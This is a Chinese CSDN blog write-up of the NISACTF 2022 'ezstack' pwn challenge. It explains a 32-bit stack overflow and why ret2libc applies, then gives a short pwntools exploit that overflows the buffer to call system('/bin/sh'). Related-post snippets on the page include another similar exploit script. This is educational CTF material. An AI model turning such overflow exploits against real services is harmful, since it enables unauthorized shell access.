【PWN · ret2libc】[NISACTF 2022]ezstack

最新推荐文章于 2024-02-02 15:10:22 发布
最新推荐文章于 2024-02-02 15:10:22 发布
阅读量1k 收藏 1
点赞数
分类专栏: 【PWN · Stack】 文章标签: ctf pwn ret2libc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/130897024
版权

一道简单的ret2libc——对标wiki的ret2libc1

目录

前言

一、题目信息

1.查看保护

2.IDA反汇编

3.pwntools获取表信息   &  "/bin/sh"信息

二、exp

总结 

前言

通过查看ELF文件信息,确定攻击方法,实现ret2libc1类型的攻击

一、题目信息

1.查看保护

2.IDA反汇编

得到信息:

  1. buf[72](0x48)却读入了0x60的信息,经典read栈溢出。 
  2. 存在system,必存在system的plt表信息;
  3. 调用system,system的got表信息已被填写。

思考ret2text——没有直接后门函数

思考ret2shellcode——bss段/可执行段不符合条件、栈上nx保护

思考ret2syscall——file查看文件,是动态链接,一般来说gadget非常少,不太适合

思考ret2libc——存在system的plt表/got表信息,且存在栈溢出漏洞,可行。

那么有没有“/bin/sh"或"/sh"让我们使用呢?否则还需要构造gets传入"/bin/sh"

—— ret2libc1和ret2libc2的区别

【PWN · ret2libc】ret2libc1_Mr_Fmnwon的博客-CSDN博客

【PWN · ret2libc】ret2libc2_Mr_Fmnwon的博客-CSDN博客

3.pwntools获取表信息   &  "/bin/sh"信息

ok,可以开始构造payload 

二、exp

具体原理可以看上面两篇博客,栈上如何构成就不在这里细讲了 

from pwn import *
context(os="linux",arch="i386",log_level="debug")

sh_addr=0x804a024
system_plt=0x8048390

payload=b'a'*(0x48+0x4)+p32(system_plt)+p32(sh_addr)+p32(sh_addr)#第一个p32(sh_addr)用于占位

io=remote(...)
io.sendline(payload)
io.interactive()

总结

简单的ret2libc1类型题目

Mr_Fmnwon
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
NISACTF 2022 writeup
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
pwn ret2libc
清霂的博客
02-04 401
目录1.攻防世界 level32.buu babyrop3.buu ciscn_2019_c_1 1.攻防世界 level3 把文件放到kali里面发现是一个压缩包(放入exeinfo里面也可以发现是压缩包),解压缩得到level3和libc.so文件 file checksec ida32 进入漏洞函数vunl(),发现有栈溢出漏洞 没有system函数和/bin/sh 题目提示了用libclibc.so是一个函数库(类似于C语言#include<iostream>的iostrea
NSSCTF刷题笔记pwn6——[NISACTF 2022]ezstack
qq_45692883的博客
02-02 208
这个shell会使用system函数打印一串内容,并且发现我们读入的数据大于buf的大小,存在栈溢出。栈溢出,system函数,/bin/sh字符串,那么万事已经具备了,开始写脚本。按下shift+12,在字符串界面找到/bin/sh。用ida打开,有一个shell函数。
NISACTF 2022 ezstack
2301_79793667的博客
12-11 175
在我输入good之后,就被弹出程序了,这时我们需要检查一下附件,然后用ida打开。buf[72] 0x48,读入0x60的信息,存在read栈溢出。用32位ida进行打开,main函数中只有一个shell函数。存在system,必存在system的plt表信息。先进行nc连接,看一下情况。首先打开环境,下载附件。/bin/sh的地址。
buuoj [第六章 CTFPWN章]stack
yongbaoii的博客
01-20 1006
ret2text 习惯性查一下保护,啥也不是。 很明显的栈溢出。 很明显的shellcode 直接十八个字节再加上返回地址就有了。 exp from pwn import* r = remote('node3.buuoj.cn',27516) #r = process('./stack') context.log_level = "debug" #gdb.attach(r) system_addr = 0x400537 payload = 'a' * 18 + p64(0x40054e) + p64(
PWN · ret2libc】ret2libc2
Mr_Fmnwon的博客
05-08 506
经过ret2libc1的洗礼,我们对ret2libc的做题模范有了基本的范式,然而实际的题目远没有如此直白和简单。本题就遇到了一个问题:"/bin/sh"字符串在程序中并不存在,怎么办?其实很简单:没有我们就自己输入。因为具体的原理在ret2libc1中已经很详细地讲述了,所以本篇博客主要复现解题过程。从最基本理解原理的ret2libc1,到有点花头的ret2libc2,值得展望的是,比赛的题目,远远难于此。但千里之行始于足下,掌握好这些基础的,掌握好这些原理,才能慢慢深入进阶。
PWN · ret2libc】[2021 鹤城杯]babyof
Mr_Fmnwon的博客
05-30 1625
64位Linux和32位Linux确乎有着关于参数传递上的不同,然而无论哪种,关于ret2libc这一题型。如果仅仅是wiki上的三道题目,那还是远远不够的。故尝试通过本题,总结ret2libc的一般过程。过程包括通过puts/write来泄露got表中的puts/write的真实地址->计算libc的基址->libc基址+任意库函数相对于libc的偏移量=任意函数真实地址->libc基址+libc中'/bin/sh'偏移量='/bin/sh'地址,如此构造system('/bin/sh')
PWN · ret2libc】ret2libc1
Mr_Fmnwon的博客
05-08 930
当函数运行到调用库函数时,程序将访问对应函数的plt表项,plt表项存着代码,代码分为两部分:第一部分,跳转到对应的got表。第二部分,查找函数的真实地址,修改got表内容。 got表项存着一个地址。然而这个地址并不一开始就是libc中函数的真实地址。 一开始,got表项中地址指向plt代码的第二部分。后来,因运行plt第二部分代码段,got表内容被修改为真实函数地址。依据以上,我们可以......分享几个实用的干货小技巧,不用IDA解决此题
初级 Pwn Ret2Libc 较万用PoC
红叶的博客
10-28 197
自己写的一个比较通用的PoC,用作备忘。建议先看看为什么要这么写再使用。
ret2libc2pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
pwn07.ret2syscall例题
11-11
ret2syscall例题
16ret2libc1_32 pwn 入门题
02-11
pwn 入门题
grpcio-1.44.0-cp39-cp39-manylinux2010_x86_64.whl
最新发布
05-31
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
grpcio-1.42.0-cp38-cp38-macosx_10_10_x86_64.whl
05-31
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
江西省抚州市信通网络科技有限公司主页图标修正版
05-31
各页面加入图标 新网站,新气象。
C评级客户流失率相对误差.jpg
05-31
C评级客户流失率相对误差
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值